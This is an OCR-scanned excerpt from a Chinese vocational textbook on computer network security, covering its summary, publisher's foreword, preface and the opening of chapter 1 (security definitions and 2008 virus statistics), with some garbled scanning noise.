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内 容 简 介 


本 书 从 网 络 安全 的 角度 出 发 ， 全 面 介绍 网 络 安全 的 基本 理论 以 及 网 络 安全 方面 的 管理 、 配 置 和 维护 。 
全 书 共 分 9 章 ， 主 要 内 容 包括 网 络 安全 概述 、 网 络 攻击 与 防范 、 拒 绝 服务 与 数据 库 安全 、 计 算 机 病毒 与 木 
马 、 安 全 防护 与 入 侵 检测 、 加 密 技 术 与 虚拟 专用 网 、 防 火 墙 、 网 络 应 用 服务 安全 配置 和 无 线 网 络 安全 。 各 
章 后 都 编排 了 习题 ， 供 学 生 课 后 复习 与 巩固 所 学 知识 。 

本 书 注重 实习 性 ， 实 例 丰富 、 典 型 ， 实 验 内 容 和 案例 融合 在 课程 内 容 中 ， 将 理论 知识 与 实践 操作 很 好 
地 结合 起 来 。 

通过 本 书 的 学 习 ， 读 者 可 以 对 网 络 安全 有 一 个 全 面 而 系统 的 认识 ， 同 时 可 以 学 会 使 用 网 络 安全 工具 。 
本 书 可 作为 高 职高 专 计算 机 、 网 络 技术 、 电 子 商务 等 相关 专业 学 生 的 教材 ， 也 可 供 相关 技术 人 员 作为 参考 
书 或 培训 教材 。 
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一 、 编 写 目的 


关于 立体 化 教材 , 国内 外 有 多 种 说 法 , 有 的 叫 “ 立 体 化 教材 ”,， 有 的 叫 “一体 化 教材 ”， 
有 的 叫 “ 多 元 化 教材 ”， 其 目的 是 一 样 的 ， 就 是 要 为 学 校 提 供 一 种 教学 资源 的 整体 解决 方 
案 ， 最 大 限度 地 满足 教学 需要 ， 满 足 教育 市 场 需求 ， 促 进 教学 改革 。 我 们 这 里 所 讲 的 立体 
化 教材 ， 其 内 容 、 形 式 、 服 务 都 是 建立 在 当前 技术 水 平和 条 件 基 础 上 的 。 

立体 化 教材 是 一 个 “一 揽 子 ” 式 的 ， 包 括 主教 材 、 教 师 参 考 书 、 学 习 指 导 书 、 试 题库 
在 内 的 完整 体系 。 主 教材 讲究 的 是 “精品 ”意识 ， 既 要 具备 指导 性 和 示范 性 ， 也 要 具有 一 
定 的 适用 性 ， 喜 新 不 大 旧 。 那 种 内 容 越 编 越 多 ， 本 子 越 编 越 厚 的 低 水 平 重复 建设 在 “立体 
化 ”的 世界 中 将 被 扫地 出 门 。 和 以 往 不 同 ，“ 立 体 化 教材 ”中 的 教师 参考 书 可 不 是 千 人 一 
面 的， 教师 参考 书 不 只 是 提供 答案 和 注释 ， 而 是 含有 与 主教 材 配套 的 大 量 参考 资料 ， 使 得 
老师 在 教学 中 能 做 到 “个 性 化 教学 ”。 学 习 指 导 书 更 像 一 本 明晰 的 地 图 册 ， 难 点 、 重 点 、 
学 习 方 法 一 目 了 然 。 试 题库 或 习题 集 则 要 完成 对 教学 效果 进行 测试 与 评价 的 任务 。 这 些 组 
成 部 分 采用 不 同 的 编写 方式 ， 把 教材 的 精华 从 各 个 角度 呈现 给 师 生 ， 既 有 重复 、 强 调 ， 又 
有 交叉 和 补充 ， 相 互 配合 ， 形 成 一 个 教学 资源 有 机 的 整体 。 

除了 内 容 上 的 扩充 ， 立 体 化 教材 的 最 大 突破 还 在 于 在 表现 形式 上 走出 了 “书本 ”这 一 
平面 媒介 的 局 限 ， 如 果 说 音像 制品 让 平面 书本 实现 了 第 一 次 “突围 ”， 那 么 电子 和 网 络 技 
术 的 大 量 运用 就 让 躺 在 书桌 上 的 教材 真正 “ 活 ” 了 起 来 。 用 PowerPoint 开发 的 电子 教案 不 
仅 大 大 减少 了 教师 案头 备课 的 时 间 ， 而 且 也 让 学 生 的 课 后 复习 更 加 有 的 放 矢 。 电 子 图 书 通 
过 数字 化 使 得 教材 的 内 容 得 以 无 限 扩张 ， 使 平面 教材 更 能 发 挥 其 提纲 扫 领 的 作用 。 

CAI 课件 把 动画 、 仿 真 等 技术 引入 了 课堂 ， 让 课程 的 难点 和 重点 一 目 了 然 ， 通 过 生动 
的 表达 方式 达到 深入 浅 出 的 目的 。 在 科学 指标 体系 控制 之 下 的 试题 库 既 可 以 轻而易举 地 制 
作 标 准 化 试卷 ， 也 能 让 学 生 进 行 模拟 实战 的 在 线 测试 ， 提 高 了 教学 质量 评价 的 客观 性 和 及 
时 性 。 网 络 课程 更 历 害 ， 它 使 教学 突破 了 空间 和 时 间 的 限制 ， 彻 底 发 挥 了 立体 化 教材 本 身 
的 潜力 ， 轻 轻 敲 击 几 下 键盘 ， 你 就 能 在 任何 时 候 得 到 有 关 课 程 的 全 部 信息 。 

最 后 还 有 资料 库 ， 它 把 教学 资料 以 知识 点 为 单位 ， 通 过 文字 、 图 形 、 图 像 、 音 频 、 视 
频 、 动 画 等 各 种 形式 ， 按 科学 的 存储 策略 组 织 起 来 ， 大 大 方便 了 教师 在 备课 、 开 发 电子 教 
案 和 网 络 课程 时 的 教学 工作 。 如 此 一 来 ， 教 材 就 “ 活 ” 了 。 学 生 和 书本 之 问 的 关系 不 再 像 
领导 与 被 领导 那样 呆板 ， 而 是 真正 有 了 互动 。 教 材 不 再 只 为 教师 们 规定 什么 重要 什么 不 重 
要 ， 而 是 成 为 教师 实现 其 教学 理念 的 最 佳 拍档 。 在 建设 观念 上 ， 从 提供 和 出 版 单一 纸 质 教 
材 转向 提供 和 出 版 较 完整 的 教学 解决 方案 ; 在 建设 目标 上 ， 以 最 大 限度 满足 教学 要 求 为 根 
本 出 发 点 ; 在 建设 方式 上 ， 不 单纯 以 现 有 教材 为 核心 ， 简 单 地 配套 电子 音像 出 版 物 ， 而 是 
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淹 济 党 粮 半 ”过 潍 侣 著作 到 汝 到 


以 课程 为 核心 ， 整 合 已 有 资源 并 聚拢 新 资源 。 

网 络 化 、 立 体 化 教材 的 出 版 是 我 社 下 一 阶段 教材 建设 的 重 中 之 重 ， 作 为 以 计算 机 教材 
出 版 为 龙头 的 清华 大 学 出 版 社 确立 了 “改变 思想 观念 ， 调 整 工作 模式 ， 构 建立 体 化 教材 体 
系 ， 大 幅度 提高 教材 服务 ”的 发 展 目 标 。 并 提出 了 首先 以 建设 “高 职高 专 计算 机 立体 化 教 
材 ” 为 重点 的 教材 出 版 规划 , 希望 通过 邀请 全 国 范围 内 的 高 职高 专 院 校 的 优秀 教师 , 在 2008 
年 共同 策划 、 编 写 这 一 套 高 职高 专 立体 化 教材 ， 利 用 网 络 等 现代 技术 手段 实现 课程 立体 化 
教材 的 资源 共享 ， 解 决 国内 教材 建设 工作 中 存在 教材 内 容 的 更 新 滞后 于 学 科 发 展 的 状况 。 
把 各 种 相互 作用 、 相 互联 系 的 媒体 和 资源 有 机 地 整合 起 来 ， 形 成 立体 化 教材 ， 把 教学 资料 
以 知识 点 为 单位 ， 通 过 文字 、 图 形 、 图 像 、 音 频 、 视 频 、 动 画 等 各 种 形式 ， 按 科学 的 存储 
策略 组 织 起 来 ， 为 高 职高 专 教学 提供 一 整套 解决 方案 。 


二 、 教 材 特点 


在 编写 思想 上 ， 以 适应 高 职高 专 教学 改革 的 需要 为 目标 ， 以 企业 需求 为 导向 ， 充 分 吸 
收 国外 经 典 教材 及 国内 优秀 教材 的 优点 ， 结 合 中 国 高 校 计 算 机 教育 的 教学 现状 ， 打 造 立 体 
化 精品 教材 。 

在 内 容 安排 上 ， 充 分 体现 先进 性 、 科 学 性 和 实用 性 ， 尽 可 能 选取 最 新 、 最 实用 的 技术 ， 
并 依照 学 生 接 受 知识 的 一 般 规律 , 通过 设计 详细 的 可 实施 的 项 目 化 案例 (而 不 仅仅 是 功能 性 
的 小 例子 )， 帮 助 学 生 掌握 要 求 的 知识 点 。 

在 教材 形式 上 ， 利 用 网 络 等 现代 技术 手段 实现 立体 化 的 资源 共享 ， 为 教材 创建 专门 的 
网 站 ， 并 提供 题库 、 素 材 、 录 像 、CAI 课件 、 案 例 分 析 ， 实 现 教师 和 学 生 在 更 大 范围 内 的 
教 与 学 互动 ， 及 时 解决 教学 过 程 中 遇 到 的 问题 。 

本 系列 教材 采用 案例 式 的 教学 方法 ， 以 实际 应 用 为 主 ， 理 论 够 用 为 度 。 教 程 中 每 一 个 
知识 点 的 结构 模式 为 “案例 (任务 ) 提 出 一 案例 关键 点 分 析 一 有 具体 操作 步骤 一 相关 知识 (技术 ) 
介绍 (理论 总 结 、 功 能 介绍 、 方 法 和 技巧 等 )”。 

本 系列 教材 将 提供 全 方位 、 立 体 化 的 服务 。 网 上 提供 电子 教案 、 文 字 或 图 片 素材 、 源 
代码 、 在 线 题库 、 模 拟 试卷 、 习 题 答案 、 案 例 动画 演示 、 专 题 拓展 、 教 学 指导 方案 等 。 

在 为 教学 服务 方面 ， 主 要 是 通过 教学 服务 专用 网 站 在 网 络 上 为 教师 和 学 生 提 供 交流 的 
场所 ， 每 个 学 科 、 每 门 课程 ， 甚 至 每 本 教材 都 建立 网 络 上 的 交流 环境 。 可 以 为 广大 教师 信 
息 交 流 、 学 术 讨 论 、 专 家 咨询 提供 服务 ， 也 可 以 让 教师 发 表 对 教材 建设 的 意见 ， 甚 至 通过 
网 络 授课 。 对 学 生来 说 ， 则 可 以 在 教学 支撑 平台 上 所 提供 的 自主 学 习 空间 上 来 实现 学 习 、 
答疑 、 作 业 、 讨 论 和 测试 ， 当 然 也 可 以 对 教材 建设 提出 意见 。 这 样 ， 在 编辑 、 作 者 、 专 家 、 
教师 、 学 生 之 间 建 立 起 一 个 以 课本 为 依据 、 以 网 络 为 纽带 、 以 数据 库 为 基础 、 以 网 站 为 门 
户 的 立体 化 教材 建设 与 实践 的 体系 ， 用 快捷 的 信息 反馈 机 制 和 优质 的 教学 服务 促进 教学 
改革 。 

本 系列 教材 专题 网 站 : http://www.wenyuan.com.cn。 


一 :一 


前 谨 


计算 机 网 络 安全 已 引起 世界 各 国 的 关注 ， 我 国 近 几 年 才 逐 渐 开 始 在 高 等 教育 中 渗透 计 
算 机 网 络 安全 方面 的 基础 知识 和 网 络 安全 技术 应 用 知识 。 随 着 网 络 高 新 技术 的 不 断 发 展 ， 
社会 经 济 建设 与 发 展 越 来 越 依 赖 于 计算 机 网 络 。 与 此 同时 ， 网 络 中 不 安全 因素 对 国民 经 济 
的 威胁 ， 甚 至 对 国家 和 地 区 的 威胁 也 日 益 严重 。 加 快 培养 网 络 安全 方面 的 应 用 型 人 才 、 广 
泛 普及 网 络 安全 知识 和 掌握 网 络 安全 技术 就 突显 重要 和 和 迫在眉睫。 但是， 这 方面 的 著作 ， 
特别 是 适合 高 职 院 校 的 著作 极为 缺乏 。 本 书 是 在 广泛 调研 和 充分 论证 的 基础 上 ， 结 合 当前 
应 用 最 为 广泛 的 网 络 攻防 技术 实例 ， 并 通过 研究 实践 而 形成 的 一 本 高 职高 专 计算 机 及 相关 
专业 网 络 安全 课程 的 教材 ， 全 书 系统 而 全 面 地 介绍 了 网 络 安全 与 管理 方面 的 相关 内 容 ， 在 
每 章 的 最 后 安排 了 实 训 内 容 ， 旨 在 使 读者 能 够 综合 运用 书 中 所 讲授 的 知识 进行 网 络 安全 与 
管理 方面 的 实践 。 

本 书 更 注重 以 能 力 为 中 心 ， 以 培养 应 用 型 和 技能 型 人 才 为 根本 ， 通 过 认识 、 实 践 、 总 
结 和 提高 这 样 一 个 认 知 过 程 ， 精 心 组 织 学 习 内 容 ， 图 文 并 成 、 深 入 浅 出 ， 全 面 适 应 社会 发 
展 需要 ， 符 合 高 等 职业 教育 教学 改革 规律 及 发 展 趋势 ， 具 有 独创 性 、 层 次 性 、 先 进 性 和 实 
用 性 。 全 书 共 分 9 章 : 第 1 章 全 面 分 析 了 计算 机 网 络 的 基本 安全 问题 ， 介 绍 了 网 络 安全 的 
基本 概念 、 内 容 和 方法 ， 以 及 当前 病毒 发 展 的 趋势 和 最 新 的 反 病 毒 技术 ; 第 2 章 重 点 介绍 
了 网 络 攻 击 与 防范 措施 ， 第 3 章 介 绍 了 拒绝 服务 与 数据 库 安 全 相关 知识 ; 第 4 章 重点 介绍 
了 计算 机 病毒 与 木马 的 概念 ， 以 及 攻击 防范 技术 ; 第 5 章 重 点 介绍 了 入 侵 与 攻击 的 基本 概 
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第 1 章 网 络 安全 概述 


【本 章 要 点 】 

通过 本 章 的 学 习 ， 可 以 了 解 网 络 安全 的 现状 及 发 展 趋势 ， 掌 握 其 定义 。 了 解 网 络 安全 
主要 表现 的 几 个 方面 : 网 络 的 物理 安全 、 网 络 拓扑 结构 安全 、 网 络 系统 安全 、 应 用 系统 安 
全 和 网 络 管理 安全 等 。 了解 当前 最 先进 的 反 病 毒 技术 。 


1.1 网络 安全 的 内 酒 


近 十 年 来 ， 随 着 计算 机 和 网 络 技术 在 社会 生活 各 方面 的 广泛 应 用 ， 计 算 机 和 计算 机 网 
络 已 经 成 为 人 们 生活 中 不 可 或 缺 的 重要 组 成 部 分 。 计 算 机 网 络 具有 的 开放 性 、 交 互 性 和 分 
散 性 等 特点 ， 使 其 很 容易 受到 干扰 和 攻击 。 计 算 机 网 络 安全 是 一 门 涉及 计算 机 科学 、 网 络 
技术 、 通 信 技 术 、 密 码 技术 、 信 息 安 全 技术 、 应 用 数学 和 信息 论 等 多 种 学 科 的 综合 性 学 科 ， 
其 涉及 访问 控制 、 身 份 验证 和 加 密 传输 等 多 个 方面 的 知识 。 

在 网 络 世界 里 ， 黑 客 攻击 事件 频频 发 生 , 现在 全 世界 平均 不 足 20 秒 就 发 生 一 次 黑客 入 
侵 事件 ， 而 全 球 每 年 因 网 络 安全 问题 造成 的 经 济 损失 也 达 数 千 亿 美元 。 现 在 ， 我 们 使 用 的 
常用 存储 介质 (如 U 盘 、CD、DVD 等 )， 都 可 能 携带 恶性 代码 ;收发 邮件 、 上 网 浏览 、 下 
载 软件 以 及 即时 通讯 都 可 能 被 黑客 利用 而 受到 攻击 ; 一 台新 计算 机 在 连接 到 网 上 不 到 15 分 
钟 即 可 能 被 扫描 到 。 所 以 我 们 所 处 的 网 络 环境 已 经 非常 不 安全 。 

随 着 全 球 信息 高 速 公路 的 建设 和 发 展 ， 个 人 、 企 业 乃 至 整个 社会 对 信息 技术 的 依赖 程 
度 越 来 越 大 ， 一 旦 网 络 系统 安全 受到 严重 威胁 ， 不 仅 会 对 个 人 造成 不 可 避免 的 损失 ， 严 重 
时 将 会 给 企业 、 社 会 、 乃 至 整个 国家 带 来 巨大 的 经 济 损失 。 因 此 ， 提 高 对 网 络 安全 重要 性 
的 认识 、 增 强 防范 意识 、 强 化 防范 措施 ， 不 仅 是 各 个 企业 、 组 织 要 重视 的 问题 ， 也 是 保证 
信息 产业 持续 稳定 发 展 的 重要 保证 和 前 提 条 件 。 


1.1.1 网络 安全 的 定义 


网 络 安全 是 指 网 络 系统 的 硬件 、 软 件 及 其 系统 中 的 数据 受到 保护 ， 不 因 偶 然 的 或 者 恶 
意 的 原因 而 遭受 到 破坏 、 更 改 、 泄 露 。 系 统 连续 可 靠 正常 地 运行 ， 网 络 服务 不 中 断 。 网 络 
安全 从 其 本 质 上 来 讲 就 是 网 络 上 的 信息 安全 。 从 广义 来 说 ， 凡 是 涉及 网 络 上 信息 的 保密 性 、 
完整 性 、 可 用 性 、 真 实 性 和 可 控 性 的 相关 技术 和 理论 都 是 网 络 安全 的 研究 领域 。 

网 络 安全 涉及 的 内 容 既 有 技术 方面 的 问题 ， 也 有 管理 方面 的 问题 ， 两 方面 相互 补充 ， 
缺 一 不 可 。 技 术 方面 主要 侧重 于 如 何 防 范 外 部 非法 攻击 ， 管 理 方面 则 侧重 于 内 部 人 为 因素 
的 管理 。 如 何 更 有 效 地 保护 重要 的 信息 数据 、 提 高 计算 机 网 络 系统 的 安全 性 已 经 成 为 所 有 
计算 机 网 络 应 用 都 必须 考虑 和 必须 解决 的 一 个 重要 问题 。 
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1.1.2 网络 安全 的 特征 


网 络 安全 一 般 应 包括 以 下 五 个 基本 特征 。 

(1) 保密 性 :确保 信息 不 泄露 给 非 授权 用 户 。 

(2) 完整 性 : 确保 数据 未 经 授权 不 能 进行 改变 的 特性 。 即 信息 在 存储 或 传输 过 程 中 保 
持 不 被 修改 、 不 被 破坏 和 丢失 的 特性 。 

(3) 可 用 性 : 确保 可 被 授权 实体 访问 并 按 需 求 使 用 的 特性 。 即 当 需 要 时 能 否 存 取 所 需 
的 信息 。 例 如 网 络 环境 下 拒绝 服务 、 破 坏 网 络 和 有 关系 统 的 正常 运行 等 都 属于 对 可 用 性 的 
攻击 。 

(4) 可 控 性 : 确保 对 信息 的 传播 及 内 容 具 有 控制 能 力 。 

(5) 可 审查 性 : 确保 出 现 安全 问题 时 提供 依据 与 手段 。 


1.2 ”网 络 安全 分 析 


从 网 络 运行 和 管理 者 的 角度 说 ， 他 们 希望 对 本 地 网 络 信息 的 访问 、 读 写 等 操作 受到 保 
护 和 控制 ， 避 免 出 现 病毒 、 非 法 存 取 、 拒 绝 服 务 、 网 络 资源 非法 占用 和 非法 控制 等 威胁 ， 
制止 和 防御 网 络 黑客 的 攻击 。 对 安全 保密 部 门 来 说 ， 他 们 希望 对 非法 的 、 有 害 的 或 涉及 国 
家 安全 的 信息 进行 过 滤 和 防 堵 ， 避 免 机 要 信息 泄露 ， 避 免 对 社会 造成 危害 、 给 国家 造成 巨 
大 损失 。 从 社会 教育 和 意识 形态 角度 来 讲 ， 网 络 上 不 健康 的 内 容 ， 会 对 社会 的 稳定 和 人 类 
的 发 展 造成 阻碍 ， 必 须 对 其 进行 控制 。 

随 着 计算 机 技术 的 迅速 发 展 ， 在 计算 机 上 处 理 的 业务 也 由 基于 单机 的 数学 运算 、 文 件 
处 理 ， 基 于 简单 连接 的 内 部 网 络 的 内 部 业务 处 理 、 办 公 自 动 化 等 发 展 到 基于 复杂 的 内 部 网 
(Intranet)、 企业 外 部 网 (Extranet)、 全球 互 联网 (Intemet) 的 企业 级 计算 机 处 理 系 统 和 世界 范围 
内 的 信息 共享 和 业务 处 理 。 在 系统 处 理 能 力 提高 的 同时 ,系统 的 连接 能 力也 在 不 断 的 提高 。 
但 在 连接 能 力 信息 、 流 通 能 力 提高 的 同时 ， 基 于 网 络 连接 的 安全 问题 也 日 益 突 出 ， 整 体 的 
网 络 安全 主要 表现 在 以 下 几 个 方面 : 网 络 的 物理 安全 、 网 络 拓扑 结构 安全 、 网 络 系统 安全 、 
应 用 系统 安全 和 网 络 管理 安全 等 。 

对 于 网 络 安全 问题 ， 为 了 防 患 于 未 然 ， 首 先 要 了 解 网 络 安全 的 根源 ， 然 后 制定 相应 的 
安全 策略 ， 做 到 事前 主动 防御 、 事 发 灵活 控制 和 事后 分 析 追 踪 。 避 免 造成 损失 。 


1.2.1 物理 安全 


网 络 的 物理 安全 是 整个 网 络 系统 安全 的 前 提 ， 也 是 整个 组 织 安全 策略 的 基本 元 素 。 总 
体 来 说 ， 物 理 安全 的 风险 主要 有 : 地 震 、 水 灾 、 火 灾 等 环境 事故 ;电源 故障 ;人 为 操作 失 
误 或 错误 ;设备 被 盗 、 被 毁 ， 电 磁 干 扰 ， 线 路 截获 等 。 因 此 要 尽量 避免 网 络 的 物理 安全 风 
险 , 对 于 足够 敏感 的 数据 和 一 些 关 键 的 网 络 基础 设施 , 可 以 在 物理 上 和 多 数 公司 用 户 分 开 ， 
并 采用 增加 的 身份 验证 技术 (如 智能 卡 登录 、 生 物 验 证 技术 等 ) 控 制 用 户 对 其 物理 上 的 访问 ， 
从 而 减少 安全 破坏 的 可 能 性 。 


1.2.2 ”网 络 结构 安全 


网 络 拓扑 结构 设计 也 直接 影响 到 网 络 系统 的 安全 性 。 当 外 部 与 内 部 网 络 进行 通信 时 ， 
内 部 网 络 的 机 器 安全 就 会 受到 威胁 ， 同 时 也 可 能 影响 在 同一 网 络 上 的 许多 其 他 系统 。 通 过 
网 络 传播 ， 还 会 影响 到 连 上 Intemet/Intranet 的 其 他 的 网 络 ， 因此， 我 们 在 设计 时 有 必要 将 
公开 服务 器 (WEB、DNS、EMAIL 等 ) 和 外 网 及 内 部 其 他 业务 网 络 进 行 必 要 的 隔离 ， 避 免 网 
络 结构 信息 外 泄 ， 同时 还 要 对 外 网 的 服务 请 求 加 以 过 滤 ， 只 允许 正常 通信 的 数据 包 到 达 相 
应 主机 ， 其 他 的 请 求 服务 在 到 达 主 机 之 前 就 应 该 遭 到 拒绝 。 


1.2.3 ”系统 安全 


系统 的 安全 是 指 整 个 网 络 操作 系统 和 网 络 硬件 平台 是 否 可 靠 且 值得 信任 。 不 管 基于 桌 
面 的 操作 系统 还 是 基于 网 络 的 操作 系统 ， 都 不 可 避免 地 存在 诸多 的 安全 隐患 ， 如 非法 存 取 、 
远程 控制 、 缓 冲 区 溢出 以 及 系统 后 门 等 。 从 各 个 操作 系统 厂商 不 断 发 布 的 安全 公告 以 及 系 
统 补丁 可 见 一 二 。 可 以 确切 地 说 ， 没 有 完全 安全 的 操作 系统 。 不 同 的 用 户 应 从 不 同 的 方面 
对 其 网 络 作 详尽 的 分 析 ， 选 择 安全 性 尽 可 能 高 的 操作 系统 。 因 此 不 但 要 选用 尽 可 能 可 靠 的 
操作 系统 和 硬件 平台 ， 并 对 操作 系统 进行 安全 配置 。 而 且 ， 必须 加 强 登录 过 程 的 认证 (特别 
是 在 到 达 服 务 器 主机 之 前 的 认证 )， 确 保 用 户 的 合法 性 ; 其 次 应 该 严格 限制 登录 者 的 操作 权 
限 ， 将 其 能 完成 的 操作 限制 在 最 小 的 范围 内 。 


1.2.4 ”应 用 系统 安全 


应 用 系统 的 安全 跟 具 体 的 应 用 有 关 ， 它 涉及 面 广 。 应 用 系统 的 安全 是 动态 的 。 应 用 的 
安全 性 也 涉及 信息 的 安全 性 ， 它 包括 很 多 方面 。 

1. 应 用 系统 的 安全 是 动态 的 、 不 断 变 化 的 

应 用 程序 配置 和 漏洞 通常 是 恶意 软件 攻击 或 利用 的 目标 。 如 攻击 者 可 以 通过 诱 使 用 户 
打开 受 感染 的 电子 邮件 附件 攻击 系统 或 使 恶意 软件 在 整个 网 路 上 达到 传播 的 目的 。 而 其 他 
如 WWW 服务 、 即 时 通讯 、FTP 服务 以 及 DNS 服务 等 都 存在 不 同 程度 的 安全 漏洞 ， 只 有 
通过 专业 的 安全 工具 不 断 发 现 漏洞 、 修 补漏 洞 ， 提 高 系统 的 安全 性 ， 才 能 有 效 防 止 恶 意 的 
攻击 。 

2. 应 用 的 安全 性 涉及 信息 、 数 据 的 安全 性 

信息 的 安全 性 涉及 机 密 信 息 泄露 、 未 经 授权 的 访问 、 假 冒 信息 、 破 坏 信息 完整 性 、 破 
坏 系 统 的 可 用 性 等 。 在 某 些 网 络 系统 中 ， 涉 及 很 多 机 密 信息 ， 如 果 一 些 重要 信息 被 窃取 或 
破坏 ， 在 经 济 、 社 会 和 政治 方面 将 造成 严重 的 影响 。 因 此 ， 对 用 户 使 用 计算 机 必须 进行 身 
份 认证 ， 对 于 重要 信息 的 通讯 必须 授权 ， 传 输 必 须 加 密 。 采 用 多 层次 的 访问 控制 与 权限 控 
制 手 段 ， 实 现 对 数据 的 安全 保护 ， 采 用 加 密 技 术 ， 保 证 网 上 传输 信息 包括 管理 员 口 令 与 账 
户 、 上 传 信息 等 的 机 密 性 与 完整 性 。 


(> i 计算 机 网 络 安全 


堂 洪 苦 糖 竹 ”十 溺 人 民众 六 省 巴 淖 对 


1.2.5 ”管理 的 安全 


管理 是 网 络 安全 最 重要 的 部 分 。 责 权 不 明 ， 安 全 管理 制度 不 健全 及 缺乏 可 操作 性 等 都 
可 能 引起 管理 安全 的 风险 。 当 网 络 出 现 攻击 行为 或 网 络 受到 其 他 一 些 安全 威胁 时 (如 内 部 人 
员 的 违规 操作 等 )， 无 法 进行 实时 的 检测 、 监 控 、 报 告 与 预警。 同时 ， 当 事故 发 生 后 ， 也 无 
法 提供 黑客 攻击 行为 的 追踪 线索 及 破案 依据 ， 即 缺乏 对 网 络 的 可 控 性 与 可 审查 性 。 这 就 要 
求 我 们 必须 对 站 点 的 访问 活动 进行 多 层次 的 记录 ， 及 时 发 现 非法 入 侵 行为 。 

建立 全 新 网 络 安全 机 制 ， 必 须 深刻 理解 网 络 并 能 提供 直接 的 解决 方案 。 因 此 ， 最 可 行 
的 做 法 是 把 健全 的 管理 制度 和 严格 管理 相 结合 。 保 障 网 络 的 安全 运行 ， 使 其 成 为 一 个 具有 
良好 的 安全 性 、 可 扩充 性 和 易 管 理性 的 信息 网 络 。 一 旦 上 述 的 安全 隐患 成 为 事实 ， 所 造成 
的 对 整个 网 络 的 损失 都 是 难以 估计 的 。 因 此 ， 网 络 的 安全 建设 是 局 域 网 建设 过 程 中 重要 的 
一 环 。 


1.3 网络 安 全 的 现状 和 发 展 趋势 


1.3.1 概况 


据 国内 知名 信息 安全 厂商 瑞星 公司 与 金山 安全 中 心 统计 、 研 究 表明 ， 病 毒 制造 的 模块 
化 、 专 业 化 以 及 病毒 “运营 ”模式 的 互联 网 化 成 为 2008 年 中 国 计 算 机 病毒 发 展 的 三 大 显著 
特征 。 目 前 “病毒 产业 互联 网 化 ”趋势 已 经 非常 明显 ， 各 种 流行 软件 、 浏 览 器 插件 、 网 站 
的 漏洞 层出不穷 。 同 时 ， 黑 客 的 “ 逐 利 性 ”依旧 没有 改变 ， 网 页 挂 马 、 漏 洞 攻击 已 成 为 黑 
客 获 利 的 主要 渠道 。 

2008 年 ， 两 大 公司 用 不 同 的 标准 对 新 增 病毒 进行 了 统计 ， 得 出 相同 的 结论 : 2008 年 的 
病毒 数量 比 2007 年 有 很 大 增长 (瑞星 统计 为 增长 12 倍 以 上 ， 金 山 统计 为 增长 48 倍 )。 其 中 
“网 页 挂 马 ” 所 传播 的 木马 、 后 门 等 病毒 占据 90% 以 上 ， 网 页 浏览 已 经 成 为 病毒 传播 的 最 
主要 渠道 。 从 病毒 的 运作 模式 看 ，2008 年 病毒 多 采用 下 载 器 关闭 安全 软件 ， 然 后 下 载 大 量 
盗号 木马 到 用 户 电脑 的 方式 盗 取 用 户 的 网 游 账号 和 网 银 账号 ， 再 发 送 到 黑客 的 数据 库 ， 具 
有 极其 明显 的 经 济 利益 特征 。 

2009 年 央视 “3，。15” 晚 会 上 曝光 的 大 量 个 人 信息 被 倒卖 的 案例 中 ， 一 个 网 名 叫 “ 顶 
狐 ” 的 黑客 ， 也 是 个 病毒 制造 高 手 ， 利 用 自己 编写 的 木马 程序 ， 每 天 盗 取 的 个 人 信息 就 达 
到 3G， 相 当 于 15 亿 个 汉字 或 100 本 辞海 字典 这 么 大 的 信息 量 。 而 这 些 信息 都 是 以 “打包 ” 
的 方式 出 售 ， 相 当 于 “批发 ”。 其 经 营 方式 是 : “ 顶 狐 ” 首 先 对 获得 的 各 种 个 人 信息 进行 
分 类 整理 ， 将 其 中 网 络 游戏 号 、 密 码 等 信息 廉价 出 售 ， 而 网 上 银行 用 户 信息 则 以 400 元 每 
G 的 价格 “打包 ” 售 出 。 有 了 上 账号 和 密码 ， 银 行 卡 里 的 钱 就 可 以 随意 支取 了 。 因 此 ， 一 些 
用 户 在 不 知 不 觉 中 ， 银 行 卡 里 的 钱 已 变 成 了 零 。 

黑客 入 侵 和 木马 攻击 越 来 越 狐 烈 ， 网 站 遭受 破坏 的 事件 时 有 发 生 。 网 络 安全 已 经 成 为 
当今 信息 社会 中 存在 的 重大 现实 问题 ， 不 仅 影响 网 民 的 个 人 生活 ， 而 且 与 国家 安全 息 息 相 
关 ， 影 响 国 家 的 经 济 、 政 治 和 军事 安全 。 


| 务 ] 各 ， 砂 终 安 全 诅 冰 


瑞星 安全 专家 指出 ， 木 马 病毒 的 编号、 传播 到 出 售 的 产业 链 已 经 完全 互联 网 化 ， 这 也 
是 导致 病毒 数量 暴 增 和 危害 增 大 的 根本 原因 ， 其 杀伤 力 、 传 播 能 力 、 破 坏 性 与 前 几 年 相 比 
有 大 幅度 的 提高 。 整 个 反 病毒 行业 已 经 面临 全 面 性 的 变革 。 


1.3.2 ”电脑 病毒 疫情 统计 


1. 瑞星 公司 2008 年 电脑 病毒 疫情 统计 


2008 年 1 月 至 10 月 , 瑞星 公司 共和 截获 新 病毒 样本 9306985 个 , 是 去 年 同期 的 12.16 倍 。 
其 中 木马 病毒 5903695 个 ,后门 病毒 1863722 个 , 两 者 之 和 超过 776 万 , 占 总 体 病 毒 的 83.4%。 
如 图 1-1 和 图 1-2 所 示 。 


尾 一 扩 一 量 
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1-1 瑞星 公司 2004 一 2008 年 新 增 病 毒 样本 数 统计 


1-2 ”瑞星 公司 分 析 2008 年 各 类 病毒 比例 图 


2. 金山 安全 中 心 2008 年 电脑 病毒 疫情 统计 

据 金山 毒霸 “ 云 安全 ”中 心 监测 数据 显示 : 2008 年 ， 金 山 毒 霸 共 截获 新 增 病毒 、 木 马 
13899717 个 ， 与 2007 年 相 比 增长 48 倍 。 在 新 增 的 病毒 、 木 马 中 ， 新 增 木马 数 为 7801911 
个 , 占 全 年 新 增 病毒 .木马 总 数 的 56.13%; 黑客 后 门类 占 全 年 新 增 病毒 、 木 马 总 数 的 21.97%; 
而 网 页 脚本 所 占 比例 从 去 年 的 0.8% 跃 升 至 5.96%, 成 为 增长 速度 最 快 的 一 类 病毒 。 如 图 1-3 
和 图 1-4 所 示 。 
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1-3 金山 安全 中 心 2003 一 2008 年 新 增 病毒 数 统计 
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1-4 ”金山 安全 中 心 分 析 2008 年 各 类 病毒 比例 图 
3. 疫情 介绍 


2008 年 ， 据 金山 毒霸 “ 云 安全 ”中 心 统计 数据 ， 全 国共 有 69738785 台 计 算 机 感染 病 
毒 ， 与 2007 年 相 比 增长 了 40%。 

瑞星 公司 对 2008 年 1 月 至 10 月 的 数据 统计 表明 ， 全 国 约 有 8100 多 万 台电 脑 (包含 企 
业 用 户 ) 曾 经 被 病毒 感染 ， 其 中 通过 网 页 挂 马 方式 被 感染 的 超过 90%。 瑞星 于 2008 年 10 月 
